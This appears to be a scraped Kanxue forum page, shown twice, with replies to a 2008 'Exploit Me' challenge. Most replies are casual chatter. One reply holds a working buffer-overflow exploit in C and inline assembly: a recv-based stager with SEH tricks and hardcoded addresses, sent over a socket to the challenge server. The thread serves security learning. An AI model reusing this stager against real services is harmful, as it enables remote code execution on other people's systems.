辞旧迎新exploit me挑战赛[题目]-3)2008 Exploit Me挑战赛-看雪-安全社区|安全招聘|kanxue.com

辞旧迎新exploit me挑战赛[题目]

发表于: 2007-12-29 19:06 128257

辞旧迎新exploit me挑战赛[题目]

failwest

2007-12-29 19:06

128257

查看主题内容

收藏・13

免费・0

支持

最新回复 (98) ◀ 1 2 3 4
GYGY 雪币： 207 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 3 回帖 14 粉丝 0 关注私信	GYGY 1 76 楼 1，MFC时候添加新类时选择dll导入即可生成一个com接口函数的调用类。 2，由于这个dll注册后，不能直接在工程中添加这个ACTIVEX控件（添加对话框中看不到），可以手工在RC文件定义，然后打开工程，再在对话框上的控件添加一个变量也可以生成接口函数类。 2008-1-1 18:59 0
xPLK 雪币： 375 活跃值： (12) 能力值： ( LV8，RANK：130 ) 在线值：发帖 18 回帖 705 粉丝 0 关注私信	xPLK 3 77 楼 ……真是牛人。。。。那么早就交了………… 2008-1-1 19:07 0
xPLK 雪币： 375 活跃值： (12) 能力值： ( LV8，RANK：130 ) 在线值：发帖 18 回帖 705 粉丝 0 关注私信	xPLK 3 78 楼提交了。。反正两个的Exploit都弄上去了不知道到时候能不能及格。。。 2008-1-1 20:38 0
锈剑雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 9 粉丝 0 关注私信	锈剑 79 楼努力学习。。 2008-1-1 20:39 0
zengyunhao 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	zengyunhao 80 楼十分钟不到，轻松搞定，嘎嘎！！ 2008-1-1 20:56 0
zengyunhao 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	zengyunhao 81 楼知道的晚点，还是朋友告诉的 2008-1-1 20:57 0
fireworld 雪币： 185 活跃值： (416) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 329 粉丝 0 关注私信	fireworld 82 楼看样子很高深的东西郁闷了 ^_^ 2008-1-1 21:00 0
黑色猎鹰雪币： 212 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 44 粉丝 0 关注私信	黑色猎鹰 83 楼带价的迷我,嘿嘿!~~~~~ 2008-1-1 21:10 0
vessial(xee) 雪币： 4536 活跃值： (897) 能力值： ( LV16，RANK：480 ) 在线值：发帖 28 回帖 126 粉丝 30 关注私信	vessial(xee) 11 84 楼时间快要到了，我已经提交了，以前根本就没有分析过activex的漏洞，这个第二题等于没做，因为我知道这是哪个软件的漏洞了，呵呵，简单的描述了一下漏洞造成的原因，shellcode都是从网上的0day捡来的。 2008-1-1 22:13 0
pcasa 雪币： 105 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 21 回帖 133 粉丝 0 关注私信	pcasa 2 85 楼总算弄完了。花了两天多的时间，手工写一个加载器，别的什么事都没有做，做得挺累的，不管结果会怎样，至少学习了一下。 2008-1-1 22:58 0
zilaiye 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 38 粉丝 0 关注私信	zilaiye 86 楼看看，在梦里搞定也说不一定。 2008-1-1 23:52 0
csshrb 雪币： 188 活跃值： (32) 能力值： ( LV4，RANK：50 ) 在线值：发帖 16 回帖 147 粉丝 0 关注私信	csshrb 1 87 楼我不懂啊 !就不下了啊 !省得浪费资源! 2008-1-2 15:36 0
雪孩子雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 19 粉丝 0 关注私信	雪孩子 88 楼作为新人，我愿意在一旁加油 2008-1-4 06:51 0
zuoyefeng 雪币： 237 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 124 粉丝 0 关注私信	zuoyefeng 89 楼 [QUOTE=;]...[/QUOTE] 来晚了第二题真的不熟的说 2008-1-4 17:14 0
vbcs 雪币： 223 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 16 回帖 96 粉丝 0 关注私信	vbcs 2 90 楼大家这么快！！！ 2008-1-4 19:11 0
黑色猎鹰雪币： 212 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 44 粉丝 0 关注私信	黑色猎鹰 91 楼怎么还不出答案！？？？？？？ 2008-1-5 22:49 0
WLDNA 雪币： 245 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 17 粉丝 0 关注私信	WLDNA 92 楼呜呜呜，几天没有来，晚了这么多啊，努力学习 2008-1-6 09:01 0
hankhe 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hankhe 93 楼跟高人们学习学习,致敬 2008-1-6 14:19 0
pppudir 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	pppudir 94 楼学习中,成绩在哪看呀。？ 2008-1-7 11:59 0
Gerald 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	Gerald 95 楼貌似来晚了... 2008-1-7 20:43 0
SyserDebug 雪币： 76 活跃值： (45) 能力值： ( LV11，RANK：180 ) 在线值：发帖 27 回帖 166 粉丝 2 关注私信	SyserDebug 4 96 楼 #include "stdafx.h" #include <Windows.h> void main() { //---------------------- // Initialize Winsock WSADATA wsaData; char* Addr1,Addr2,Addr3; __asm { mov Addr1,offset local_001 mov Addr2,offset local_002 mov Addr3,offset local_003 jmp local_003 local_001: xor eax,eax mov ah,7 sub esp,eax xor eax,eax mov edx,esp push eax mov ah,5 push eax push edx push ebx mov eax,0x4080d8ff shr eax,8 call [eax]; 调用recv函数继续接收另外一个数据包 cmp eax,0xffffffff jz short local_004 mov ecx,esp jmp ecx ;这里也就是跳转到 local_002 local_004: xor edx,edx //如果第二个数据包接收失败则直接返回 mov dh,7 add esp,edx xor edx,edx mov dl,0xc mov eax,0x401258ff ;这里不能有 0 所以 shr eax,8 mov [esp+edx],eax ret local_002: ;这里是第二个包的开始 call local_005 //构造一个结构化异常 pushad //这里是结构化异常处理函数 call local_100 local_100: pop ebx add ebx, offset local_011 sub ebx, offset local_100 mov eax,[esp+0x2c] add dword ptr[eax+0xb0],0x1000 //eax 寄存器加 0x1000 mov dword ptr[eax+0xb8],ebx //修改 eip 寄存器 popad // 这里继续搜索 pe 头 mov eax,ExceptionContinueExecution ret local_005: push fs:[0] ;构造结构化异常 mov fs:[0],esp push ebp mov ebp,esp pushad push 0 ;MB_OK call local_98 ; message tital _emit('H') _emit('e') _emit('l') _emit('l') _emit('o') _emit(0) local_98: call local_99 _emit('t') _emit('e') _emit('s') _emit('t') _emit(0) local_99: push 0 mov eax,0x77d5058a //这里是针对 xp+sp user32.dll 5.1.2600.3099 版本的 messagebox 的位置这里偷懒了，直接写一个固定地址 call eax jmp local_78 mov eax,0x70000000 local_011: cmp word ptr[eax],'ZM' jz local_012 local_013: add eax,0x1000 jmp local_011 local_012: mov ebx,[eax+0x3c] cmp dword ptr[eax+ebx],'EP' jnz local_013 local_78: popad mov esp,ebp pop ebp mov eax,[esp] mov fs:[0],eax lea esp,[esp+8] xor edx,edx mov dh,7 add esp,edx xor edx,edx mov dl,0xc mov eax,0x401258 mov [esp+edx],eax ret local_003: } int iResult = WSAStartup(MAKEWORD(2,2), &wsaData); if (iResult != NO_ERROR) printf("Error at WSAStartup()\n"); //---------------------- // Create a SOCKET for connecting to server SOCKET ConnectSocket; ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (ConnectSocket == INVALID_SOCKET) { printf("Error at socket(): %ld\n", WSAGetLastError()); WSACleanup(); return; } //---------------------- // The sockaddr_in structure specifies the address family, // IP address, and port of the server to be connected to. sockaddr_in clientService; clientService.sin_family = AF_INET; clientService.sin_addr.s_addr = inet_addr( "127.0.0.1" ); clientService.sin_port = htons( 7777 ); //---------------------- // Connect to server. if ( connect( ConnectSocket, (SOCKADDR) &clientService, sizeof(clientService) ) == SOCKET_ERROR) { printf( "Failed to connect.\n" ); WSACleanup(); return; } char buf[512]; memset (buf,'a',sizeof(buf)); memcpy(buf,Addr1,Addr2-Addr1); (DWORD*)&buf[200]=0x40129c; send(ConnectSocket,buf,sizeof(buf),0); memset(buf,'a',sizeof(buf)); memcpy(buf,Addr2,Addr3-Addr2); send(ConnectSocket,buf,sizeof(buf),0); printf("Connected to server.\n"); Sleep(1000); WSACleanup(); return; } 2008-1-13 00:18 0
Bughoho 雪币： 1946 活跃值： (243) 能力值： (RANK：330 ) 在线值：发帖 72 回帖 1217 粉丝 27 关注私信	Bughoho 8 97 楼 syser也来凑热闹了 2008-1-13 00:21 0
dummy 雪币： 272 活跃值： (143) 能力值： ( LV15，RANK：930 ) 在线值：发帖 43 回帖 273 粉丝 5 关注私信	dummy 23 98 楼 syser! 2008-1-13 00:25 0
ooezez 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 25 粉丝 0 关注私信	ooezez 99 楼瞧瞧去～支持 2008-1-13 16:20 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

failwest

发帖

回帖

330

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (98) ◀ 1 2 3 4
GYGY 雪币： 207 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 3 回帖 14 粉丝 0 关注私信	GYGY 1 76 楼 1，MFC时候添加新类时选择dll导入即可生成一个com接口函数的调用类。 2，由于这个dll注册后，不能直接在工程中添加这个ACTIVEX控件（添加对话框中看不到），可以手工在RC文件定义，然后打开工程，再在对话框上的控件添加一个变量也可以生成接口函数类。 2008-1-1 18:59 0
xPLK 雪币： 375 活跃值： (12) 能力值： ( LV8，RANK：130 ) 在线值：发帖 18 回帖 705 粉丝 0 关注私信	xPLK 3 77 楼 ……真是牛人。。。。那么早就交了………… 2008-1-1 19:07 0
xPLK 雪币： 375 活跃值： (12) 能力值： ( LV8，RANK：130 ) 在线值：发帖 18 回帖 705 粉丝 0 关注私信	xPLK 3 78 楼提交了。。反正两个的Exploit都弄上去了不知道到时候能不能及格。。。 2008-1-1 20:38 0
锈剑雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 9 粉丝 0 关注私信	锈剑 79 楼努力学习。。 2008-1-1 20:39 0
zengyunhao 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	zengyunhao 80 楼十分钟不到，轻松搞定，嘎嘎！！ 2008-1-1 20:56 0
zengyunhao 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	zengyunhao 81 楼知道的晚点，还是朋友告诉的 2008-1-1 20:57 0
fireworld 雪币： 185 活跃值： (416) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 329 粉丝 0 关注私信	fireworld 82 楼看样子很高深的东西郁闷了 ^_^ 2008-1-1 21:00 0
黑色猎鹰雪币： 212 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 44 粉丝 0 关注私信	黑色猎鹰 83 楼带价的迷我,嘿嘿!~~~~~ 2008-1-1 21:10 0
vessial(xee) 雪币： 4536 活跃值： (897) 能力值： ( LV16，RANK：480 ) 在线值：发帖 28 回帖 126 粉丝 30 关注私信	vessial(xee) 11 84 楼时间快要到了，我已经提交了，以前根本就没有分析过activex的漏洞，这个第二题等于没做，因为我知道这是哪个软件的漏洞了，呵呵，简单的描述了一下漏洞造成的原因，shellcode都是从网上的0day捡来的。 2008-1-1 22:13 0
pcasa 雪币： 105 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 21 回帖 133 粉丝 0 关注私信	pcasa 2 85 楼总算弄完了。花了两天多的时间，手工写一个加载器，别的什么事都没有做，做得挺累的，不管结果会怎样，至少学习了一下。 2008-1-1 22:58 0
zilaiye 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 38 粉丝 0 关注私信	zilaiye 86 楼看看，在梦里搞定也说不一定。 2008-1-1 23:52 0
csshrb 雪币： 188 活跃值： (32) 能力值： ( LV4，RANK：50 ) 在线值：发帖 16 回帖 147 粉丝 0 关注私信	csshrb 1 87 楼我不懂啊 !就不下了啊 !省得浪费资源! 2008-1-2 15:36 0
雪孩子雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 19 粉丝 0 关注私信	雪孩子 88 楼作为新人，我愿意在一旁加油 2008-1-4 06:51 0
zuoyefeng 雪币： 237 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 124 粉丝 0 关注私信	zuoyefeng 89 楼 [QUOTE=;]...[/QUOTE] 来晚了第二题真的不熟的说 2008-1-4 17:14 0
vbcs 雪币： 223 活跃值： (10) 能力值： ( LV6，RANK：90 ) 在线值：发帖 16 回帖 96 粉丝 0 关注私信	vbcs 2 90 楼大家这么快！！！ 2008-1-4 19:11 0
黑色猎鹰雪币： 212 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 44 粉丝 0 关注私信	黑色猎鹰 91 楼怎么还不出答案！？？？？？？ 2008-1-5 22:49 0
WLDNA 雪币： 245 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 17 粉丝 0 关注私信	WLDNA 92 楼呜呜呜，几天没有来，晚了这么多啊，努力学习 2008-1-6 09:01 0
hankhe 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 8 粉丝 0 关注私信	hankhe 93 楼跟高人们学习学习,致敬 2008-1-6 14:19 0
pppudir 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	pppudir 94 楼学习中,成绩在哪看呀。？ 2008-1-7 11:59 0
Gerald 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	Gerald 95 楼貌似来晚了... 2008-1-7 20:43 0
SyserDebug 雪币： 76 活跃值： (45) 能力值： ( LV11，RANK：180 ) 在线值：发帖 27 回帖 166 粉丝 2 关注私信	SyserDebug 4 96 楼 #include "stdafx.h" #include <Windows.h> void main() { //---------------------- // Initialize Winsock WSADATA wsaData; char* Addr1,Addr2,Addr3; __asm { mov Addr1,offset local_001 mov Addr2,offset local_002 mov Addr3,offset local_003 jmp local_003 local_001: xor eax,eax mov ah,7 sub esp,eax xor eax,eax mov edx,esp push eax mov ah,5 push eax push edx push ebx mov eax,0x4080d8ff shr eax,8 call [eax]; 调用recv函数继续接收另外一个数据包 cmp eax,0xffffffff jz short local_004 mov ecx,esp jmp ecx ;这里也就是跳转到 local_002 local_004: xor edx,edx //如果第二个数据包接收失败则直接返回 mov dh,7 add esp,edx xor edx,edx mov dl,0xc mov eax,0x401258ff ;这里不能有 0 所以 shr eax,8 mov [esp+edx],eax ret local_002: ;这里是第二个包的开始 call local_005 //构造一个结构化异常 pushad //这里是结构化异常处理函数 call local_100 local_100: pop ebx add ebx, offset local_011 sub ebx, offset local_100 mov eax,[esp+0x2c] add dword ptr[eax+0xb0],0x1000 //eax 寄存器加 0x1000 mov dword ptr[eax+0xb8],ebx //修改 eip 寄存器 popad // 这里继续搜索 pe 头 mov eax,ExceptionContinueExecution ret local_005: push fs:[0] ;构造结构化异常 mov fs:[0],esp push ebp mov ebp,esp pushad push 0 ;MB_OK call local_98 ; message tital _emit('H') _emit('e') _emit('l') _emit('l') _emit('o') _emit(0) local_98: call local_99 _emit('t') _emit('e') _emit('s') _emit('t') _emit(0) local_99: push 0 mov eax,0x77d5058a //这里是针对 xp+sp user32.dll 5.1.2600.3099 版本的 messagebox 的位置这里偷懒了，直接写一个固定地址 call eax jmp local_78 mov eax,0x70000000 local_011: cmp word ptr[eax],'ZM' jz local_012 local_013: add eax,0x1000 jmp local_011 local_012: mov ebx,[eax+0x3c] cmp dword ptr[eax+ebx],'EP' jnz local_013 local_78: popad mov esp,ebp pop ebp mov eax,[esp] mov fs:[0],eax lea esp,[esp+8] xor edx,edx mov dh,7 add esp,edx xor edx,edx mov dl,0xc mov eax,0x401258 mov [esp+edx],eax ret local_003: } int iResult = WSAStartup(MAKEWORD(2,2), &wsaData); if (iResult != NO_ERROR) printf("Error at WSAStartup()\n"); //---------------------- // Create a SOCKET for connecting to server SOCKET ConnectSocket; ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (ConnectSocket == INVALID_SOCKET) { printf("Error at socket(): %ld\n", WSAGetLastError()); WSACleanup(); return; } //---------------------- // The sockaddr_in structure specifies the address family, // IP address, and port of the server to be connected to. sockaddr_in clientService; clientService.sin_family = AF_INET; clientService.sin_addr.s_addr = inet_addr( "127.0.0.1" ); clientService.sin_port = htons( 7777 ); //---------------------- // Connect to server. if ( connect( ConnectSocket, (SOCKADDR) &clientService, sizeof(clientService) ) == SOCKET_ERROR) { printf( "Failed to connect.\n" ); WSACleanup(); return; } char buf[512]; memset (buf,'a',sizeof(buf)); memcpy(buf,Addr1,Addr2-Addr1); (DWORD*)&buf[200]=0x40129c; send(ConnectSocket,buf,sizeof(buf),0); memset(buf,'a',sizeof(buf)); memcpy(buf,Addr2,Addr3-Addr2); send(ConnectSocket,buf,sizeof(buf),0); printf("Connected to server.\n"); Sleep(1000); WSACleanup(); return; } 2008-1-13 00:18 0
Bughoho 雪币： 1946 活跃值： (243) 能力值： (RANK：330 ) 在线值：发帖 72 回帖 1217 粉丝 27 关注私信	Bughoho 8 97 楼 syser也来凑热闹了 2008-1-13 00:21 0
dummy 雪币： 272 活跃值： (143) 能力值： ( LV15，RANK：930 ) 在线值：发帖 43 回帖 273 粉丝 5 关注私信	dummy 23 98 楼 syser! 2008-1-13 00:25 0
ooezez 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 25 粉丝 0 关注私信	ooezez 99 楼瞧瞧去～支持 2008-1-13 16:20 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复